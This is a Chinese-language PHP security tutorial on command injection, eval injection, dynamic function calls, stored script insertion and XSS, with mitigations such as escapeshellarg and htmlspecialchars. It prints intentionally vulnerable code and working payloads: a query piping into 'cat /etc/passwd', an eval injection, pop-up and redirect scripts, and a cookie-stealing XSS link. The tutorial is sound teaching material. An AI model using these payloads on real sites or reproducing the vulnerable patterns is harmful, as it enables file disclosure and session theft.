string指定PHP程序可以改变的环境变量的前缀,如:safe_mode_allowed_env_vars = PHP_ ,当这个选项的值为空时,那么php可以改变任何环境变量safe_mode_protected_env_vars = string用来指定php程序不可改变的环境变量的前缀3.限制外部程序的执行safe_mode_exec_dir = string此选项指定的文件夹路径影响system.exec.popen.passthru,不影响shell_exec和"` `".disable_functions = string不同的函数名称用逗号隔开,此选项不受安全模式影响magic quotes用来让php程序的输入信息自动转义,所有的单引号("'"),双引号("""),反斜杠("\")和空字符(NULL),都自动被加上反斜杠进行转义magic_quotes_gpc = On 用来设置magic quotes 为On,它会影响HTTP请求的数据(GET.POST.Cookies)程序员也可以使用addslashes来转义提交的HTTP请求数据,或者用stripslashes来删除转义命令注入攻击PHP中可以使用下列5个函数来执行外部的应用程序或函数system.exec.passthru.shell_exec.``(与shell_exec功能相同)函数原型string system(string command, int &return_var)command 要执行的命令return_var 存放执行命令的执行后的状态值string exec (string command, array &output, int &return_var) command 要执行的命令output 获得执行命令输出的每一行字符串return_var 存放执行命令后的状态值void passthru (string command, int &return_var)command 要执行的命令return_var 存放执行命令后的状态值string shell_exec (string command)command 要执行的命令漏洞实例例1://ex1.php<?php$dir = $_GET["dir"];if (isset($dir)){echo "<pre>";system("ls -al ".$dir);echo "</pre>";}?>我们提交/ex1.php?dir=| cat /etc/passwd提交以后,命令变成了 system("ls -al | cat /etc/passwd");eval注入攻击eval函数将输入的字符串参数当作PHP程序代码来执行函数原型:mixed eval(string code_str) //eval注入一般发生在攻击者能控制输入的字符串的时候//ex2.php<?php$var = "var";if (isset($_GET["arg"])){$arg = $_GET["arg"];eval("\$var = $arg;");echo "\$var =".$var;}?>当我们提交 /ex2.php?arg=phpinfo();漏洞就产生了 动态函数<?phpfunc A(){dosomething();}func B(){dosomething();}if (isset($_GET["func"])){$myfunc = $_GET["func"];echo $myfunc();}?>程序员原意是想动态调用A和B函数,那我们提交/ex.php?func=phpinfo 漏洞产生防范方法1.尽量不要执行外部命令2.使用自定义函数或函数库来替代外部命令的功能3.使用escapeshellarg函数来处理命令参数4.使用safe_mode_exec_dir指定可执行文件的路径esacpeshellarg函数会将任何引起参数或命令结束的字符转义,单引号"'",替换成"\'",双引号""",替换成"\"",分号";"替换成"\;"用safe_mode_exec_dir指定可执行文件的路径,可以把会使用的命令提前放入此路径内safe_mode = Onsafe_mode_exec_di r= /usr/local/php/bin/客户端脚本植入客户端脚本植入(Script Insertion),是指将可以执行的脚本插入到表单.图片.动画或超链接文字等对象内.当用户打开这些对象后,攻击者所植入的脚本就会被执行,进而开始攻击.可以被用作脚本植入的HTML标签一般包括以下几种:1.<script>标签标记的javascript和vbscript等页面脚本程序.在<script>标签内可以指定js程序代码,也可以在src属性内指定js文件的URL路径2.<object>标签标记的对象.这些对象是java applet.多媒体文件和ActiveX控件等.通常在data属性内指定对象的URL路径3.<embed>标签标记的对象.这些对象是多媒体文件,例如:swf文件.通常在src 属性内指定对象的URL路径4.<applet>标签标记的对象.这些对象是java applet,通常在codebase属性内指定对象的URL路径5.<form>标签标记的对象.通常在action属性内指定要处理表单数据的web应用程序的URL路径客户端脚本植入的攻击步骤1.攻击者注册普通用户后登陆网站2.打开留言页面,插入攻击的js代码3.其他用户登录网站(包括管理员),浏览此留言的内容4.隐藏在留言内容中的js代码被执行,攻击成功实例数据库Create TABLE `postmessage` (`id` int(11) NOT NULL auto_increment,`subject` varchar(60) NOT NULL default '',`name` varchar(40) NOT NULL default '',`email` varchar(25) NOT NULL default '',`question` mediumtext NOT NULL,`postdate` datetime NOT NULL default '0000-00-00 00:00:00',PRIMARY KEY (`id`)) ENGINE=MyISAM DEFAULT CHARSET=gb2312 COMMENT='使用者的留言' AUTO_INCREMENT=69 ;//add.php 插入留言//list.php 留言列表//show.php 显示留言浏览此留言的时候会执行js脚本插入 <script>while(1){windows.open();}</script> 无限弹框插入<script>location.href="";</script> 跳转钓鱼页面或者使用其他自行构造的js代码进行攻击防范的方法一般使用htmlspecialchars函数来将特殊字符转换成HTML编码函数原型string htmlspecialchars (string string, int quote_style, string charset) string 是要编码的字符串quote_style 可选,值可为ENT_COMPAT ENT_QUOTES ENT_NOQUOTES,默认值ENT_COMPAT,表示只转换双引号不转换单引号.ENT_QUOTES,表示双引号和单引号都要转换.ENT_NOQUOTES,表示双引号和单引号都不转换charset 可选,表示使用的字符集函数会将下列特殊字符转换成html编码:& ----> &" ----> "' ----> '< ----> <> ----> >把show.php的第98行改成<?php echo htmlspecialchars(nl2br($row['question']), ENT_QUOTES); ?> 然后再查看插入js的漏洞页面xss跨站脚本攻击XSS(Cross Site Scripting),意为跨网站脚本攻击,为了和样式表css(Cascading Style Sheet)区别,缩写为XSS跨站脚本主要被攻击者利用来读取网站用户的cookies或者其他个人数据,一旦攻击者得到这些数据,那么他就可以伪装成此用户来登录网站,获得此用户的权限.跨站脚本攻击的一般步骤:1.攻击者以某种方式发送xss的http链接给目标用户2.目标用户登录此网站,在登陆期间打开了攻击者发送的xss链接3.网站执行了此xss攻击脚本4.目标用户页面跳转到攻击者的网站,攻击者取得了目标用户的信息5.攻击者使用目标用户的信息登录网站,完成攻击当有存在跨站漏洞的程序出现的时候,攻击者可以构造类似/search.php?key=<script>document.location='/getcookie.php?cookie='+document.cookie;</script> ,诱骗用户点击后,可以获取用户cookies值防范方法:利用htmlspecialchars函数将特殊字符转换成HTML编码函数原型string htmlspecialchars (string string, int quote_style, string charset) string 是要编码的字符串quote_style 可选,值可为ENT_COMPAT、ENT_QUOTES、ENT_NOQUOTES,默认值ENT_COMPAT,表示只转换双引号不转换单引号。